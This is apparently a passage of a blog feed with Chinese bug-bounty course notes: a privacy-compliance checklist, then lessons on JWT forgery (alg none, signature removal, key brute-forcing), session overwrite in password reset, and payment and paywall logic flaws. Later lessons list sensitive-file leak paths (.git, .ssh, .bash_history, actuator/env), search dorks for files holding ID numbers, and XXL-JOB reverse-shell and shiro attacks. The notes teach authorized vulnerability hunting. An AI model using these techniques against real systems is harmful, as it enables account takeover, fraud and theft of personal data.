title="隐私合规测试清单"></a>隐私合规测试清单</h2><ol><li>隐私政策文本中未逐一列出App收集使用个人信息目的，类型，收集方式等内容。可制作表格清单，包括APP功能，权限，个人信息类型，目的。<br>共享个人信息和委托处理个人信息的第三方清单（包括嵌入的第三方代码，插件）至少需要在隐私政策中列出1、对外共享，转让，公开披露个人信息的目的2、涉及的个人信息类型3、接收方类型或身份</li><li>隐私政策文本中使用概述文字描述收集的个人信息类型。如：包括但不限于，例如，等</li><li>隐私政策未以单独成文的形式发布，作为用户协议、用户说明，或在其它文件中存在的个人信息保护相关条款文件中的一部分存在</li><li>隐私政策未说明app运营者的基本情况：公司名称，联系地址，个人信息保护联系方式</li><li>隐私政策中未明确政策更新日期</li><li>隐私政策文本中未显著标识个人敏感信息（字体加粗，标型号等）的，视为未对收集个人敏感信息进行充分告知</li><li>隐私政策文本中有关收集使用规则的内容晦涩难懂，冗长繁琐，让用户难以理解，如使用大量专业术语等。（不建议挖）</li><li>隐私政策，未对个人信息的查询，更新，删除，注销以及用户撤回已同意授权等操作方式进行明确说明。</li><li>隐私政策文本中未描述个人信息安全投诉，举报渠道。</li><li>举报渠道不可用，如果是总机电话为提供个人信息保护分机，热线电话未提供菜单键</li><li>未说明个人信息存储期限，超期处理方式</li><li>如使用定向推送，提升用户体验，用户画像等自动化决策功能，隐私政策文本中未明确说明关闭提供关闭选项。</li><li>如果存在个人信息出境，隐私政策文本中未将出境个人信息类型逐项列出并显著标识。若不存在个人信息出境情形也需说明。</li></ol>]]></content>
    
    
    <summary type="html">&lt;h1 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h1&gt;&lt;p&gt;隐私合规漏洞第1,2课。&lt;/p&gt;</summary>
    
    
    
    <category term="SRC" scheme="http://example.com/categories/SRC/"/>
    
    
    <category term="SRC" scheme="http://example.com/tags/SRC/"/>
    
  </entry>
  
  <entry>
    <title>SRC_course_12</title>
    <link href="http://example.com/2023/12/18/SRC_course_12/"/>
    <id>http://example.com/2023/12/18/SRC_course_12/</id>
    <published>2023-12-17T16:00:00.000Z</published>
    <updated>2023-12-18T06:31:02.695Z</updated>
    
    <content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>本课内容主要是补充之前没讲到的。逻辑漏洞新课程第1节。</p><span id="more"></span><h1 id="jwt"><a href="#jwt" class="headerlink" title="jwt"></a>jwt</h1><p>定义: JWT全称json web token，是一种使用json为数据载体，通过对称与非对称对数据进行加密，可以保证数据输出的时候不修改，一般用于认证Authentication与授权Authorization<br>靶场: <code>https://github.com/h-a-c/jwt-lab</code><br>解密站点: <code>https://jwt.io</code><br>特征：以eyJ开头，以点号(.)分为三个部分的数据。</p><p>格式：<br>Header 声明算法及其它参数<br>payload 声明各种数据，明文传输，如id、user等<br>Signature对header和payloadj进行签名，签名方式在header</p><p>认证流程：</p><ol><li>登录 user&#x3D;abc&amp;pwd&#x3D;123 返回包：token&#x3D;[jwt内容]</li><li>Auth: eyJxxx.xxx.xxx user  (直接把jwt当作是cookie，修改jwt即可)</li></ol><p>案例1：</p><ol><li>修改签名算法：手动调整JWT的header，将算法改为none，构造后提交: {“alg”:”none”,”typ”:”JWT”}</li><li>删除签名：当服务端配置不当的时候，可能出现不校验JWT签名的场景。删除JWT的signature后服务器仍接收token，那么可以伪造任意身份了。</li></ol><p>案例2：</p><ol start="3"><li><p>报错导致泄露签名信息：JWT的payload不应包含任何敏感信息（如密码），如果base64 deacode后包含敏感信息，就可以加以利用。另类似CVE-2019-7644，在customErrors配置签名返回的报错信息包含正确签名</p></li><li><p>爆破密钥</p></li></ol><h1 id="session覆盖"><a href="#session覆盖" class="headerlink" title="session覆盖"></a>session覆盖</h1><p>案例1:<br>浏览器打开两个重置密码的网页，过程总共有3步：确认账号(自行输入账号)，安全验证，重置密码<br>第1个网页的账号是自己的，第2个网页的账号是别人的。<br>第1个网页的步骤来到第3步重置密码，输入新密码。<br>第2个网页在第1步确认账号，点击确定到下一步。<br>最后第1个网页点最后的确认，即可更改第2个网页账号的密码。</p><p>案例2：<br>抓包发现userId，更改后，返回包内容token部分发现jwt，再将jwt放在请求包替换，即可越权登录。</p><h1 id="支付漏洞的覆盖操作"><a href="#支付漏洞的覆盖操作" class="headerlink" title="支付漏洞的覆盖操作"></a>支付漏洞的覆盖操作</h1><p>场景：<br>一个平台有青铜会员和铂金会员两种。<br>一年：青铜会员33元，铂金会员45元。<br>一周：青铜会员1元，铂金会员2元。</p><p>操作方式：<br>先购买1年青铜会员，再购买1年铂金会员。结果铂金会员变成2年。或者先买1年青铜再买1周铂金，也是1年铂金。</p><h1 id="付费简历模板"><a href="#付费简历模板" class="headerlink" title="付费简历模板"></a>付费简历模板</h1><p>页面存在付费模板和免费模板。<br>免费模板可预览，可编辑，导出到本地。付费模板只能先选择购买，无法点击预览。</p><p>操作方式（前端越权）：<br>F12，将免费模板可预览的代码复制。然后将代码粘贴到付费模板。<br>此时付费模板即可预览。</p><h1 id="spring技巧-1"><a href="#spring技巧-1" class="headerlink" title="spring技巧-1"></a>spring技巧-1</h1><p><code>https://xxx.com/swagger-resources</code><br>用默认字典去扫，可以看到显示为：<br><code>[&#123;&quot;name&quot;:&quot;default&quot;,&quot;location&quot;:&quot;/--internal--/swgr&quot;,&quot;swaggerVersion&quot;:&quot;2.0&quot;&#125;]</code></p><p>此时选择做一个拼接：<br>拼接路径(价值10元): <code>https://xxx.com/--internal--/swgr</code><br>重点关注paths路径，看一下请求方法，是get还是post，直接去跑目录<br>例如： <code>/--internal--/mgmt/env/</code> 如果返回401，则说明有鉴权，放弃<br><code>/user/messages/&#123;userMsgld&#125;</code>  显示unauthorized，则说明有鉴权，放弃</p><h1 id="spring技巧-2"><a href="#spring技巧-2" class="headerlink" title="spring技巧-2"></a>spring技巧-2</h1><p>swagger界面：监控平台控制台API文档</p><p>操作方式： 首先点右上角Try it out，然后点id*required，加上相应的值，最后点Execute。<br>抓包查看是否成功。<br>成功则说明可以造成越权操作。<br>不仅可以挖越权，还有注入，XSS，上传等等。</p><h1 id="host碰撞漏洞"><a href="#host碰撞漏洞" class="headerlink" title="host碰撞漏洞"></a>host碰撞漏洞</h1><p>host碰撞不是漏洞，只是找到一个资产（不可提交）</p><p>操作方式：打开某个内网，一般无法访问。本地配置host文件，再访问即可。<br>host碰撞工具: <code>https://github.com/fofapro/Hosts_scan</code></p><h1 id="空白页对抗"><a href="#空白页对抗" class="headerlink" title="空白页对抗"></a>空白页对抗</h1><p>通过findsomething，查找接口。找到隐藏信息。</p>]]></content>
    
    
    <summary type="html">&lt;h1 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h1&gt;&lt;p&gt;本课内容主要是补充之前没讲到的。逻辑漏洞新课程第1节。&lt;/p&gt;</summary>
    
    
    
    <category term="SRC" scheme="http://example.com/categories/SRC/"/>
    
    
    <category term="SRC" scheme="http://example.com/tags/SRC/"/>
    
  </entry>
  
  <entry>
    <title>SRC_course_10</title>
    <link href="http://example.com/2023/12/17/SRC_course_10/"/>
    <id>http://example.com/2023/12/17/SRC_course_10/</id>
    <published>2023-12-16T16:00:00.000Z</published>
    <updated>2023-12-17T13:13:53.522Z</updated>
    
    <content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>捡漏洞。漏洞课程第5节。</p><span id="more"></span><h1 id="信息泄露漏洞"><a href="#信息泄露漏洞" class="headerlink" title="信息泄露漏洞"></a>信息泄露漏洞</h1><h2 id="案例1–目录文件泄露"><a href="#案例1–目录文件泄露" class="headerlink" title="案例1–目录文件泄露"></a>案例1–目录文件泄露</h2><p>直接访问web应用存在的一些目录，如果返回文件列表信息，证明存在此漏洞。（一般需要有敏感文件）</p><p>挖掘方法：Google Hacking 语法: intext:Index of &#x2F;</p><h2 id="案例2–git源码泄露"><a href="#案例2–git源码泄露" class="headerlink" title="案例2–git源码泄露"></a>案例2–git源码泄露</h2><p>利用工具GitHack.py( <code>https://github.com/lijiejie/GitHack</code> )<br><code>python GitHack.py https://ip/.git/</code> 即可将源码下载</p><h2 id="案例3–svn信息泄露"><a href="#案例3–svn信息泄露" class="headerlink" title="案例3–svn信息泄露"></a>案例3–svn信息泄露</h2><p>利用工具: <code>https://github.com/admintony/svnExploit</code><br>示例: <code>xx.com/lab2/.svn/entries</code></p><h2 id="案例4–DS-Store文件泄露-htacess泄露"><a href="#案例4–DS-Store文件泄露-htacess泄露" class="headerlink" title="案例4–DS_Store文件泄露, htacess泄露"></a>案例4–DS_Store文件泄露, htacess泄露</h2><p>利用脚本: <code>https://github.com/lijiejie/ds_store_exp</code></p><p>漏洞示例: <code>https://www.example.com/.DS_Store</code><br><code>https://www.example.com/.htacess</code></p><h2 id="案例5–泄露合集"><a href="#案例5–泄露合集" class="headerlink" title="案例5–泄露合集"></a>案例5–泄露合集</h2><p>druid未授权访问漏洞<br><code>ip/druid/index.html  ## Druid Index</code><br><code>ip/druid/sql.html  ## Druid sql监控页面</code><br><code>ip/druid/weburi.html  ## Druid Web URI监控页面</code><br><code>ip/druid/websession.html  ## Druid Web Session监控页面</code><br><code>json:ip/druid/webrui.json  ## Druid Web URI json</code><br><code>ip/druid/websession.json  ## Druid Web Session json</code><br>Druid 登录接口: <code>ip/druid/login.html  ## Druid登录认证页面Druid未授权访问路径</code></p><p><strong>其它泄露</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">/debug/pprof/cmdline</span><br><span class="line">/.DS_Store</span><br><span class="line">/.git/index/</span><br><span class="line">/.svn/entries</span><br><span class="line">/graphql</span><br><span class="line">/tenant</span><br><span class="line">/sources</span><br><span class="line">/actuators/env/</span><br><span class="line">/swagger-ui.html</span><br></pre></td></tr></table></figure><p>Spring的env泄露<br><code>/actuator/env</code></p><p>Spring泄露（可测接口）<br><code>/swagger-ui.html</code></p><p><code>/.bashrc</code> 个人配置记录<br><code>/.ssh/authorized_keys</code> 公钥<br><code>/.bash_history 泄露了站点服务器所有的操作记录</code></p><p>sql查询语句泄露（报错即可）</p><h2 id="补充案例1–测试环境"><a href="#补充案例1–测试环境" class="headerlink" title="补充案例1–测试环境"></a>补充案例1–测试环境</h2><p>测试环境漏洞环境<br>资产脆弱点一般在测试环境</p><ol><li>一般的测试开发环境，域名中总会带有一些特别的标记来识别，如常见的一些 <code>dev.xxx.com stc.xxx.com stm.xxx.com cmm..xxx.com test.xxx.com</code> 等等</li><li>某些SRC平台在他们的评分标准中已经整理出一些测试域名，如oppsrc: OSRC OPPO自有业务的测试环境，包括且不限于域名中含有dev、test，或业务为开发测试之用，或域名属于: <code>*.wanyol.com  *.myoas.net</code></li></ol><h2 id="补充案例2–网盘"><a href="#补充案例2–网盘" class="headerlink" title="补充案例2–网盘"></a>补充案例2–网盘</h2><p>威胁情报获取（网盘）<br>通过企业名+关键词的方法进行排查，常见关键词有：<br>合同，设计图纸，身份证，通讯录，花名册，报表，投标文件，入职等。<br>情报提交时说明网盘链接h和截图，方便厂商排查即可。<br>推荐网盘搜索引擎：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">https://www.lingfengyun.com/</span><br><span class="line">https://www.quzhuanpan.com/</span><br><span class="line">https://www.pansoso.com/</span><br><span class="line">https://wp.soshoulu.com/</span><br></pre></td></tr></table></figure><h2 id="补充案例3–浏览器"><a href="#补充案例3–浏览器" class="headerlink" title="补充案例3–浏览器"></a>补充案例3–浏览器</h2><p>威胁情报获取（浏览器）<br>Google搜索payload(文件类型+根域+关键词)：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">filetype:xls site:xxx.example.com sfzh</span><br><span class="line">filetype:xls site:xxx.example.com 身份证号</span><br><span class="line">filetype:pdf site:xxx.example.com sfzh</span><br><span class="line">filetype:pdf site:xxx.example.com 身份证号</span><br></pre></td></tr></table></figure><p>bing搜payload：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">inurl:example inurl:PDF 机密等级 ABC</span><br><span class="line">inurl:/backup intitle:index of backup intext:*sql site:xxx.example.com</span><br></pre></td></tr></table></figure><h2 id="补充案例4–可能错过的漏洞"><a href="#补充案例4–可能错过的漏洞" class="headerlink" title="补充案例4–可能错过的漏洞"></a>补充案例4–可能错过的漏洞</h2><p>需要二次认证的账号（拿到账号密码，虽然进不去，可以直接提交）</p><h2 id="补充案例5–网站被黑信息"><a href="#补充案例5–网站被黑信息" class="headerlink" title="补充案例5–网站被黑信息"></a>补充案例5–网站被黑信息</h2><p>在该URL处：<code>http://xx.com/js/dywe.js</code> ,访问js，在sidmap参数处可以看到很多url，访问发现为与xxx无关的恶意请求</p><h1 id="具体案例"><a href="#具体案例" class="headerlink" title="具体案例"></a>具体案例</h1><h2 id="刷赞"><a href="#刷赞" class="headerlink" title="刷赞"></a>刷赞</h2><p>返回包中出现存在点赞数量，修改数量即可。</p><h2 id="日志泄露"><a href="#日志泄露" class="headerlink" title="日志泄露"></a>日志泄露</h2><p>发现日志记录直接提交</p><h2 id="上传XSS"><a href="#上传XSS" class="headerlink" title="上传XSS"></a>上传XSS</h2><p>除了普通的上传xss文件，还可以上传svg格式的xss</p><h2 id="XXL-JOB-任务调度中心-反弹getshell"><a href="#XXL-JOB-任务调度中心-反弹getshell" class="headerlink" title="XXL-JOB(任务调度中心)-反弹getshell"></a>XXL-JOB(任务调度中心)-反弹getshell</h2><p>xxl-job命令执行<br><code>https://xxx.com/toLogin</code><br>存在弱口令<br>可利用任务调度执行反弹shell</p><h2 id="shiro反序列化漏洞"><a href="#shiro反序列化漏洞" class="headerlink" title="shiro反序列化漏洞"></a>shiro反序列化漏洞</h2><p>利用工具</p><h2 id="app-XSS"><a href="#app-XSS" class="headerlink" title="app XSS"></a>app XSS</h2><p>app的XSS比较多</p><h1 id="场景案例"><a href="#场景案例" class="headerlink" title="场景案例"></a>场景案例</h1><h2 id="抽奖场景"><a href="#抽奖场景" class="headerlink" title="抽奖场景"></a>抽奖场景</h2><p>从“中奖用户”这个点：尝试查看用户敏感信息，如手机号<br>从“抽奖”这个点：尝试并发，重放。还有修改抽奖积分为负值。<br>从“抽奖记录”这个点：尝试越权查看其它用户信息。<br>从“赚积分”这个点：尝试大量赚取积分。</p><p>注意隐藏参数</p><p>在线客服：尝试XSS</p><p>抓包的userId，找到没被加密的id。</p><h2 id="论坛场景"><a href="#论坛场景" class="headerlink" title="论坛场景"></a>论坛场景</h2><p>发布问题添加payload</p><ol><li>利用位置绕过</li><li>app，小程序绕过</li><li>fuzz</li></ol><p>获取匿名用户的真实用户信息</p><h2 id="付费课程场景"><a href="#付费课程场景" class="headerlink" title="付费课程场景"></a>付费课程场景</h2><p>在观看试听课程点“章节”，抓包<br>查找m3u8文件链接。（m3u8是视频流文件）<br>可以直接在m3u8在线网站播放。</p><h2 id="通用思路"><a href="#通用思路" class="headerlink" title="通用思路"></a>通用思路</h2><p>场景：企业邮箱注册。<br>常规注册：利用本公司的公司邮箱注册<br>绕过：抓包，修改邮箱。</p>]]></content>
    
    
    <summary type="html">&lt;h1 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h1&gt;&lt;p&gt;捡漏洞。漏洞课程第5节。&lt;/p&gt;</summary>
    
    
    
    <category term="SRC" scheme="http://example.com/categories/SRC/"/>
    
    
    <category term="SRC" scheme="http://example.com/tags/SRC/"/>
    
  </entry>
  
</feed>
